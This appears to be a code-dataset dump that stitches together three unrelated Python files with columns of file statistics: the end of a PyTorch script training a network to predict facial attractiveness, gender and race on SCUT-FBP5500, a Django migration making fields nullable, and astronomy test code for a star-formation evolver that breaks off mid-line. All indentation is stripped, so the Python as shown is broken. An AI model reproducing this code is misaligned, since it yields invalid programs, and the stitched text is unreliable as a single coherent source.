if i % 50 == 49: # print every 100 mini-batches
print('[%d, %5d] loss: %.5f' % (epoch + 1, i + 1, running_loss / 50))
running_loss = 0.0
hmt_net.eval()
predicted_attractiveness_values = []
gt_attractiveness_values = []
total = 0
g_correct = 0
r_correct = 0
for data in test_loader:
images, g_gt, r_gt, a_gt = data['image'], data['gender'], data['race'], \
data['attractiveness']
hmt_net = hmt_net.to(device)
g_gt = g_gt.to(device)
r_gt = r_gt.to(device)
a_gt = a_gt.to(device)
images = images.to(device)
bs, ncrops, c, h, w = images.size()
g_pred, r_pred, a_pred = hmt_net(images.view(-1, c, h, w)) # fuse batch size and ncrops
a_pred = a_pred.view(bs, ncrops, -1).mean(1) # avg over crops
g_pred = g_pred.view(bs, ncrops, -1).mean(1) # avg over crops
r_pred = r_pred.view(bs, ncrops, -1).mean(1) # avg over crops
predicted_attractiveness_values += a_pred.to("cpu").data.numpy().tolist()
gt_attractiveness_values += a_gt.to("cpu").numpy().tolist()
g_pred = g_pred.view(cfg['batch_size'], -1)
r_pred = r_pred.view(cfg['batch_size'], -1)
_, g_predicted = torch.max(g_pred.data, 1)
_, r_predicted = torch.max(r_pred.data, 1)
total += g_gt.size(0)
g_correct += (g_predicted == g_gt).sum().item()
r_correct += (r_predicted == r_gt).sum().item()
print('total = %d ...' % total)
print('Gender correct sample = %d ...' % g_correct)
print('Race correct sample = %d ...' % r_correct)
print('Accuracy of Race Classification: %.4f' % (r_correct / total))
print('Accuracy of Gender Classification: %.4f' % (g_correct / total))
mae_lr = round(
mean_absolute_error(np.array(gt_attractiveness_values),
np.array(predicted_attractiveness_values).ravel()), 4)
rmse_lr = round(np.math.sqrt(
mean_squared_error(np.array(gt_attractiveness_values),
np.array(predicted_attractiveness_values).ravel())), 4)
pc = round(
np.corrcoef(np.array(gt_attractiveness_values), np.array(predicted_attractiveness_values).ravel())[
0, 1], 4)
print('===============The Mean Absolute Error of HMT-Net is {0}===================='.format(mae_lr))
print('===============The Root Mean Square Error of HMT-Net is {0}===================='.format(rmse_lr))
print('===============The Pearson Correlation of HMT-Net is {0}===================='.format(pc))
model_path_dir = './model'
file_utils.mkdirs_if_not_exist(model_path_dir)
torch.save(hmt_net.state_dict(), os.path.join(model_path_dir, 'hmt-net-fbp-epoch-%d.pth' % (epoch + 1)))
hmt_net.train()
print('Finished Training')
print('Save trained model...')
model_path_dir = './model'
file_utils.mkdirs_if_not_exist(model_path_dir)
torch.save(hmt_net.state_dict(), os.path.join(model_path_dir, 'hmt-net-fbp.pth'))
else:
print('Loading pre-trained model...')
hmt_net.load_state_dict(torch.load(os.path.join('./model/hmt-net-fbp.pth')))
hmt_net.eval()
predicted_attractiveness_values = []
gt_attractiveness_values = []
total = 0
g_correct = 0
r_correct = 0
for data in test_loader:
images, g_gt, r_gt, a_gt = data['image'], data['gender'], data['race'], \
data['attractiveness']
hmt_net = hmt_net.to(device)
g_gt = g_gt.to(device)
r_gt = r_gt.to(device)
a_gt = a_gt.to(device)
images = images.to(device)
bs, ncrops, c, h, w = images.size()
g_pred, r_pred, a_pred = hmt_net(images.view(-1, c, h, w)) # fuse batch size and ncrops
a_pred = a_pred.view(bs, ncrops, -1).mean(1) # avg over crops
g_pred = g_pred.view(bs, ncrops, -1).mean(1) # avg over crops
r_pred = r_pred.view(bs, ncrops, -1).mean(1) # avg over crops
predicted_attractiveness_values += a_pred.to("cpu").data.numpy().tolist()
gt_attractiveness_values += a_gt.to("cpu").numpy().tolist()
# g_pred = g_pred.view(-1, g_pred.numel())
# r_pred = r_pred.view(-1, r_pred.numel())
g_pred = g_pred.view(cfg['batch_size'], -1)
r_pred = r_pred.view(cfg['batch_size'], -1)
_, g_predicted = torch.max(g_pred.data, 1)
_, r_predicted = torch.max(r_pred.data, 1)
total += g_gt.size(0)
g_correct += (g_predicted == g_gt).sum().item()
r_correct += (r_predicted == r_gt).sum().item()
print('total = %d ...' % total)
print('Gender correct sample = %d ...' % g_correct)
print('Race correct sample = %d ...' % r_correct)
print('Accuracy of Race Classification: %.4f' % (r_correct / total))
print('Accuracy of Gender Classification: %.4f' % (g_correct / total))
mae_lr = round(
mean_absolute_error(np.array(gt_attractiveness_values), np.array(predicted_attractiveness_values).ravel()), 4)
rmse_lr = round(np.math.sqrt(
mean_squared_error(np.array(gt_attractiveness_values), np.array(predicted_attractiveness_values).ravel())), 4)
pc = round(np.corrcoef(np.array(gt_attractiveness_values), np.array(predicted_attractiveness_values).ravel())[0, 1],
4)
print('===============The Mean Absolute Error of HMT-Net is {0}===================='.format(mae_lr))
print('===============The Root Mean Square Error of HMT-Net is {0}===================='.format(rmse_lr))
print('===============The Pearson Correlation of HMT-Net is {0}===================='.format(pc))
if __name__ == '__main__':
# print('***************************start training GNet***************************')
# gnet = GNet()
# criterion = nn.CrossEntropyLoss()
# train_loader, test_loader = data_loader.load_scutfbp5500_64()
# optimizer = optim.SGD(gnet.parameters(), lr=0.001, momentum=0.9, weight_decay=5e-2)
# train_gnet(gnet, train_loader, test_loader, criterion, optimizer, num_epochs=170, inference=False)
# print('***************************finish training GNet***************************')
# print('###############################start training RNet###############################')
# rnet = RNet()
# criterion = nn.CrossEntropyLoss()
# train_loader, test_loader = data_loader.load_scutfbp5500_64()
# optimizer = optim.SGD(rnet.parameters(), lr=0.001, momentum=0.9, weight_decay=5e-2)
# train_rnet(rnet, train_loader, test_loader, criterion, optimizer, num_epochs=170, inference=False)
# print('###############################finish training RNet###############################')
# print('***************************start training ANet***************************')
# train_loader, test_loader = data_loader.load_scutfbp5500_64()
# train_anet(VggM(), train_loader, test_loader, nn.MSELoss(), 200, False)
# print('***************************end training ANet***************************')
print('+++++++++++++++++++++++++++++++++start training HMT-Net on SCUT-FBP5500+++++++++++++++++++++++++++++++++')
hmtnet = HMTNet()
# train_loader, test_loader = data_loader.load_scutfbp5500_cv(cv_index=1)
train_loader, test_loader = data_loader.load_scutfbp5500_64()
train_hmtnet(hmtnet, train_loader, test_loader, 250, False)
print('+++++++++++++++++++++++++++++++++finish training HMT-Net SCUT-FBP5500+++++++++++++++++++++++++++++++++')
| 38.498311
| 120
| 0.569699
| 2,824
| 22,791
| 4.40687
| 0.081445
| 0.026356
| 0.017356
| 0.019285
| 0.887184
| 0.882764
| 0.870068
| 0.856649
| 0.846364
| 0.834552
| 0
| 0.019389
| 0.273573
| 22,791
| 591
| 121
| 38.563452
| 0.732302
| 0.134615
| 0
| 0.747945
| 0
| 0
| 0.13343
| 0.02179
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013699
| false
| 0
| 0.057534
| 0
| 0.071233
| 0.153425
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ce58b10137da4636163eeb5be212907139406173
| 3,749
|
py
|
Python
|
association/core/migrations/0014_alter_cashier_deletedat_alter_demand_deletedat_and_more.py
|
gabrielroot/orgManagment_django
|
a5f181ecedebc64db583031aef7a50c96d4b07de
|
[
"MIT"
] | null | null | null |
association/core/migrations/0014_alter_cashier_deletedat_alter_demand_deletedat_and_more.py
|
gabrielroot/orgManagment_django
|
a5f181ecedebc64db583031aef7a50c96d4b07de
|
[
"MIT"
] | null | null | null |
association/core/migrations/0014_alter_cashier_deletedat_alter_demand_deletedat_and_more.py
|
gabrielroot/orgManagment_django
|
a5f181ecedebc64db583031aef7a50c96d4b07de
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.2 on 2022-03-01 19:54
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('core', '0013_remove_partner_message'),
]
operations = [
migrations.AlterField(
model_name='cashier',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='demand',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='demand',
name='teasurer',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.teasurer'),
),
migrations.AlterField(
model_name='financialtransaction',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='justification',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='justification',
name='member',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.member'),
),
migrations.AlterField(
model_name='member',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='member',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='montlypayment',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='montlypayment',
name='dueDate',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='president',
name='endMandate',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='request',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='request',
name='president',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.president'),
),
migrations.AlterField(
model_name='trip',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='trip',
name='endDate',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='usevehicle',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='usevehicle',
name='member',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.member'),
),
migrations.AlterField(
model_name='vehicle',
name='deletedAt',
field=models.DateTimeField(blank=True, null=True),
),
]
| 35.037383
| 133
| 0.580955
| 354
| 3,749
| 6.053672
| 0.175141
| 0.167989
| 0.209986
| 0.243584
| 0.788147
| 0.788147
| 0.734018
| 0.734018
| 0.734018
| 0.708819
| 0
| 0.007235
| 0.299547
| 3,749
| 106
| 134
| 35.367925
| 0.808835
| 0.012003
| 0
| 0.77
| 1
| 0
| 0.104808
| 0.007293
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.03
| 0
| 0.06
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ce9464c524b8048f1a0cc05006b5d220d3c01791
| 49,831
|
py
|
Python
|
centralms/tests/test_evolver.py
|
changhoonhahn/centralMS
|
39b4509ea99e47ab5cf1f9be8775d53eee6de80f
|
[
"MIT"
] | 1
|
2018-05-30T23:43:52.000Z
|
2018-05-30T23:43:52.000Z
|
centralms/tests/test_evolver.py
|
changhoonhahn/centralMS
|
39b4509ea99e47ab5cf1f9be8775d53eee6de80f
|
[
"MIT"
] | 2
|
2017-04-24T22:58:40.000Z
|
2017-04-24T22:59:28.000Z
|
centralms/tests/test_evolver.py
|
changhoonhahn/centralMS
|
39b4509ea99e47ab5cf1f9be8775d53eee6de80f
|
[
"MIT"
] | null | null | null |
import numpy as np
import time
import env
import catalog as Cat
import evolver as Evol
import observables as Obvs
import util as UT
import matplotlib.pyplot as plt
import corner as DFM
from ChangTools.plotting import prettyplot
from ChangTools.plotting import prettycolors
def test_Evolver_time(sfh, nsnap0=None, downsampled=None, tduty=1., abias=0.):
''' Time how long a single run of the evolver takes from start to finish
'''
# set parameter values
theta = Evol.defaultTheta(sfh)
if 'random_step' in sfh:
theta['sfh']['dt_min'] = tduty
theta['sfh']['dt_max'] = tduty
theta['mass']['t_step'] = 0.05
if theta['mass']['t_step'] > tduty/10.:
theta['mass']['t_step'] = tduty/10.
if abias > 0.:
theta['sfh']['t_abias'] = 2. # assembly bias timescale
theta['sfh']['sigma_corr'] = abias
else:
theta['sfh']['t_abias'] = None # assembly bias timescale
# read in the central subhalo catalog
t_cat = time.time()
subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
subcat = subhist.Read(downsampled=downsampled)
print (time.time() - t_cat), 'seconds to read pure central catalog'
# run it through the evolver
t_evo = time.time()
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
eev.Initiate()
print (time.time() - t_evo), 'seconds to initiate'
t_evo = time.time()
eev.Evolve()
print (time.time() - t_evo), 'seconds to evolve'
return None
def test_Evolver_logSFRinitiate(sfh, nsnap0=None):
''' Test the log(SFR) initiate step within Evolver.Evolve()
'''
# load in Subhalo Catalog (pure centrals)
subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
print subhist.File()
subcat = subhist.Read()
# load in generic theta (parameter values)
theta = Evol.defaultTheta(sfh)
for k in theta.keys():
print k, '---', theta[k]
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
eev.Initiate()
eev.Evolve(forTests=True)
#subcat = eev.SH_catalog
sfr_kwargs = eev.sfr_kwargs # SFR keyword arguments
#logSFR_logM_z = self.logSFR_logM_z # logSFR(logM, z) function
prettyplot()
pretty_colors = prettycolors()
if sfh in ['random_step', 'random_step_fluct']:
#print 'dlogSFR_amp', sfr_kwargs['dlogSFR_amp'].shape
#print 'tsteps', sfr_kwargs['tsteps'].shape
i_rand = np.random.choice(range(sfr_kwargs['dlogSFR_amp'].shape[0]), size=10, replace=False)
fig = plt.figure()
sub = fig.add_subplot(111)
for ii in i_rand:
#print sfr_kwargs['tsteps'][ii, :]
#print sfr_kwargs['dlogSFR_amp'][ii, :]
sub.plot(sfr_kwargs['tsteps'][ii, :], sfr_kwargs['dlogSFR_amp'][ii, :])
sub.set_xlim([UT.t_nsnap(nsnap0), UT.t_nsnap(1)])
plt.show()
elif sfh in ['random_step_abias']:
i_rand = np.random.choice(range(sfr_kwargs['dlogSFR_amp'].shape[0]), size=10, replace=False)
fig = plt.figure()
sub = fig.add_subplot(111)
for ii in i_rand: #range(sfr_kwargs['dlogSFR_amp'].shape[1]):
#print sfr_kwargs['tsteps'][ii, :]
#print sfr_kwargs['dlogSFR_amp'][ii, :]
sub.scatter(sfr_kwargs['dMhalos'][ii,:], sfr_kwargs['dlogSFR_corr'][ii,:])
sub.set_xlim([-0.2, 0.2])
sub.set_ylim([-3.*theta['sfh']['sigma_corr'], 3.*theta['sfh']['sigma_corr']])
plt.show()
else:
raise NotImplementedError
return None
def test_Evolver_ODEsolver(sfh, nsnap0=None):
''' Test the ODE solver in the Evolver. We compare the results between Euler
ODE solver and the scipy integrate odeint's fancy solver.
========================================
COMPARISON SHOWS GOOD AGREEMENT.
========================================
'''
solvers = ['euler', 'scipy']
prettyplot()
pretty_colors = prettycolors()
fig = plt.figure(figsize=(18, 7*len(solvers)))
for i_s, solver in enumerate(solvers):
# load in Subhalo Catalog (pure centrals)
subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
print subhist.File()
subcat = subhist.Read()
# load in generic theta (parameter values)
theta = Evol.defaultTheta(sfh)
theta['mass']['solver'] = solver
for k in theta.keys():
print k, '---', theta[k]
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
eev.Initiate()
eev.Evolve()
isSF = np.where(subcat['gclass'] == 'star-forming')[0]
sub = fig.add_subplot(len(solvers),2,i_s*len(solvers)+1)
for n in range(2, nsnap0+1)[::-1]:
# identify SF population at snapshot
smf_sf = Obvs.getMF(subcat['snapshot'+str(n)+'_m.star'][isSF],
weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
sub.set_xlim([6.75, 12.])
sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
sub.set_ylim([1e-5, 10**-1.75])
sub.set_yscale('log')
sub.set_ylabel('log $\Phi$', fontsize=25)
sub.legend(loc='upper right')
# mark the solver type
sub.text(0.15, 0.9, solver.upper(), ha='center', va='center',
transform=sub.transAxes)
sub = fig.add_subplot(len(solvers),2,i_s*len(solvers)+2)
smhmr = Obvs.Smhmr()
m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
sig_mstar_mh12 = smhmr.sigma_logMstar(subcat['halo.m'][isSF], subcat['m.star'][isSF], Mhalo=12.)
sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
sub.text(0.3, 0.9, '$\sigma_{log\, M*}(M_h = 10^{12} M_\odot)$ ='+str(round(sig_mstar_mh12, 3)),
ha='center', va='center', transform=sub.transAxes)
sub.set_xlim([10.5, 14.])
sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
sub.set_ylim([8., 12.])
sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
fig.savefig(''.join([UT.fig_dir(), sfh+'_ODEsolver.png']), bbox_inches='tight')
plt.close()
return None
def test_RandomStep_timescale(sig_smhm=None, nsnap_ancestor=20):
''' Test the impact of the timescale for random step SFH scheme
'''
# load in generic theta (parameter values)
theta = Evol.defaultTheta('random_step')
for tstep in [0.01, 0.05][::-1]:
theta['sfh'] = {'name': 'random_step',
'dt_min': tstep, 'dt_max': tstep, 'sigma': 0.3}
theta['mass']['t_step'] = np.min([0.05, tstep/10.])
# load in Subhalo Catalog (pure centrals)
subhist = Cat.PureCentralHistory(sigma_smhm=sig_smhm, nsnap_ancestor=nsnap_ancestor)
subcat = subhist.Read()
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap_ancestor)
eev.Initiate()
eev.Evolve()
subcat = eev.SH_catalog
#prettyplot()
pretty_colors = prettycolors()
isSF = np.where(subcat['gclass'] == 'star-forming')[0]
fig = plt.figure(figsize=(25,7))
sub = fig.add_subplot(1,3,1)
for n in range(2, nsnap_ancestor+1)[::-1]:
# identify SF population at snapshot
smf_sf = Obvs.getMF(subcat['snapshot'+str(n)+'_m.star'][isSF],
weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
sub.set_xlim([6.75, 12.])
sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
sub.set_ylim([1e-5, 10**-1.75])
sub.set_yscale('log')
sub.set_ylabel('log $\Phi$', fontsize=25)
sub.legend(loc='upper right')
sub = fig.add_subplot(1,3,2)
smhmr = Obvs.Smhmr()
m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
# also plot the SHAM SMHMR
m_mid, mu_msham, sig_msham, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.sham'][isSF])
sub.plot(m_mid, mu_msham + sig_msham, ls='--', c='k')
sub.plot(m_mid, mu_msham - sig_msham, ls='--', c='k')
sub.set_xlim([10.5, 14.])
sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
sub.set_ylim([8., 12.])
sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap_ancestor))[0]
m_bin = np.arange(9.0, 12.5, 0.5)
i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
sub = fig.add_subplot(1,3,3)
for i in np.unique(i_bin):
i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(nsnap_ancestor),
theta_SFMS=eev.theta_sfms) + subcat['m.star0'][isSF[i_rand]])[0]]
sub.text(UT.t_nsnap(nsnap_ancestor - i) + 0.1, dsfrs[0] + 0.02, '$\mathcal{M}_* \sim $'+str(m_bin[i]), fontsize=15)
for nn in range(2, nsnap_ancestor)[::-1]:
M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
mu_sfr = Obvs.SSFR_SFMS(M_nn, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
mu_sfr = Obvs.SSFR_SFMS(subcat['m.star'][isSF[i_rand]],
UT.z_nsnap(1), theta_SFMS=eev.theta_sfms) + subcat['m.star'][isSF[i_rand]]
dsfrs.append(subcat['sfr'][isSF[i_rand]] - mu_sfr[0])
sub.plot(UT.t_nsnap(range(1, nsnap_ancestor+1)[::-1]), dsfrs, c=pretty_colors[i], lw=2)
sub.plot([UT.t_nsnap(nsnap_ancestor), UT.t_nsnap(1)], [0.3, 0.3], c='k', ls='--', lw=2)
sub.plot([UT.t_nsnap(nsnap_ancestor), UT.t_nsnap(1)], [-0.3, -0.3], c='k', ls='--', lw=2)
sub.set_xlim([UT.t_nsnap(nsnap_ancestor), UT.t_nsnap(1)])
sub.set_xlabel('$t_{cosmic}$', fontsize=25)
sub.set_ylim([-1., 1.])
sub.set_ylabel('$\Delta$log SFR', fontsize=25)
fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
fig.savefig(
''.join([UT.fig_dir(), 'random_step.nsnap0_', str(nsnap_ancestor),
'.sigmaSMHM', str(sig_smhm), '.tstep', str(tstep), '.png']),
bbox_inches='tight')
plt.close()
del subhist
return None
def EvolverQAplots(subcat, theta, savefig=None):
''' Given subhalo catalog
'''
prettyplot()
pretty_colors = prettycolors()
nsnap0 = subcat['nsnap0']
isSF = np.where(subcat['gclass'] == 'star-forming')[0]
fig = plt.figure(figsize=(25,7))
sub = fig.add_subplot(1,3,1)
for n in range(2, nsnap0+1)[::-1]:
# identify SF population at snapshot
smf_sf = Obvs.getMF(subcat['snapshot'+str(n)+'_m.star'][isSF],
weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
sub.set_xlim([6.75, 12.])
sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
sub.set_ylim([1e-5, 10**-1.75])
sub.set_yscale('log')
sub.set_ylabel('log $\Phi$', fontsize=25)
sub.legend(loc='upper right')
sub = fig.add_subplot(1,3,2)
smhmr = Obvs.Smhmr()
m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
# also plot the SHAM SMHMR
m_mid, mu_msham, sig_msham, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.sham'][isSF])
sub.plot(m_mid, mu_msham + sig_msham, ls='--', c='k')
sub.plot(m_mid, mu_msham - sig_msham, ls='--', c='k')
sub.set_xlim([10.5, 14.])
sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
sub.set_ylim([8., 12.])
sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap0))[0]
m_bin = np.arange(9.0, 12.5, 0.5)
i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
sub = fig.add_subplot(1,3,3)
for i in np.unique(i_bin):
i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(nsnap0),
theta_SFMS=theta['sfms']) + subcat['m.star0'][isSF[i_rand]])[0]]
sub.text(UT.t_nsnap(nsnap0 - i) + 0.1, dsfrs[0] + 0.02, '$\mathcal{M}_* \sim $'+str(m_bin[i]), fontsize=15)
for nn in range(2, nsnap0)[::-1]:
M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
mu_sfr = Obvs.SSFR_SFMS(M_nn, UT.z_nsnap(nn), theta_SFMS=theta['sfms']) + M_nn
dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
mu_sfr = Obvs.SSFR_SFMS(subcat['m.star'][isSF[i_rand]],
UT.z_nsnap(1), theta_SFMS=theta['sfms']) + subcat['m.star'][isSF[i_rand]]
dsfrs.append(subcat['sfr'][isSF[i_rand]] - mu_sfr[0])
sub.plot(UT.t_nsnap(range(1,nsnap0+1)[::-1]), dsfrs, c=pretty_colors[i], lw=2)
sub.plot([UT.t_nsnap(nsnap0), UT.t_nsnap(1)], [0.3, 0.3], c='k', ls='--', lw=2)
sub.plot([UT.t_nsnap(nsnap0), UT.t_nsnap(1)], [-0.3, -0.3], c='k', ls='--', lw=2)
sub.set_xlim([UT.t_nsnap(nsnap0), UT.t_nsnap(1)])
sub.set_xlabel('$t_{cosmic}$', fontsize=25)
sub.set_ylim([-1., 1.])
sub.set_ylabel('$\Delta$log SFR', fontsize=25)
fig.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
if savefig is not None:
fig.savefig(''.join([UT.fig_dir(), sfh+'_eval.png']), bbox_inches='tight')
plt.close()
return None
else:
return fig
def EvolverPlots(sfh, nsnap0=None):
'''
'''
# load in Subhalo Catalog (pure centrals)
subhist = Cat.PureCentralHistory(nsnap_ancestor=nsnap0)
subcat = subhist.Read()
# load in generic theta (parameter values)
theta = Evol.defaultTheta(sfh)
eev = Evol.Evolver(subcat, theta, nsnap0=nsnap0)
eev.Initiate()
eev.Evolve()
subcat = eev.SH_catalog
#prettyplot()
pretty_colors = prettycolors()
isSF = np.where(subcat['gclass'] == 'star-forming')[0]
fig = plt.figure(figsize=(25,7))
sub = fig.add_subplot(1,3,1)
for n in range(2, nsnap0+1)[::-1]:
# identify SF population at snapshot
smf_sf = Obvs.getMF(subcat['snapshot'+str(n)+'_m.star'][isSF],
weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=2, c='b', alpha=0.05 * (21. - n))
smf_sf = Obvs.getMF(subcat['m.star'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf[0], smf_sf[1], lw=3, c='b', ls='-', label='Integrated')
smf_sf_msham = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
sub.plot(smf_sf_msham[0], smf_sf_msham[1], lw=3, c='k', ls='--', label='SHAM')
sub.set_xlim([6.75, 12.])
sub.set_xlabel('Stellar Masses $(\mathcal{M}_*)$', fontsize=25)
sub.set_ylim([1e-5, 10**-1.75])
sub.set_yscale('log')
sub.set_ylabel('log $\Phi$', fontsize=25)
sub.legend(loc='upper right')
sub = fig.add_subplot(1,3,2)
smhmr = Obvs.Smhmr()
m_mid, mu_mstar, sig_mstar, cnts = smhmr.Calculate(subcat['halo.m'][isSF], subcat['m.star'][isSF])
sig_mstar_mh12 = smhmr.sigma_logMstar(subcat['halo.m'][isSF], subcat['m.star'][isSF], Mhalo=12.)
sub.errorbar(m_mid, mu_mstar, yerr=sig_mstar)
sub.fill_between(m_mid, mu_mstar - 0.2, mu_mstar + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
sub.text(0.3, 0.9, '$\sigma_{log\, M*}(M_h = 10^{12} M_\odot)$ ='+str(round(sig_mstar_mh12, 3)),
ha='center', va='center', transform=sub.transAxes)
sub.set_xlim([10.5, 14.])
sub.set_xlabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
sub.set_ylim([8., 12.])
sub.set_ylabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == nsnap0))[0]
m_bin = np.arange(9.0, 12.5, 0.5)
i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
sub = fig.add_subplot(1,3,3)
for i in np.unique(i_bin):
i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
